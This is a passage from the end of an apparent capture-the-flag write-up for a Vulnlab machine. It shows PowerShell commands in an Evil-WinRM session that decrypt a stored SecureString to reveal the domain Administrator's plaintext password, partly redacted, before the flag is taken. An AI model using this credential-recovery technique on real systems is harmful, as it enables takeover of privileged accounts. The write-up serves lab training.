We need to use PowerShell to retrieve the plain text password, so let’s come back to our WinRM session :
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $user = "LUSMS\Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e56000000000200000000000<REDACTED>" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $cred.GetNetworkCredential() | fl
UserName : Administrator
Password : XZ9i=bgA8<REDACTED>
SecurePassword : System.Security.SecureString
Domain : LUSMS
We can now retrieve the flag, and we are done with this machine.
The part about the web service was really cool ! another technique that we can put in our skill set, and again an amazing chain from Vulnlab !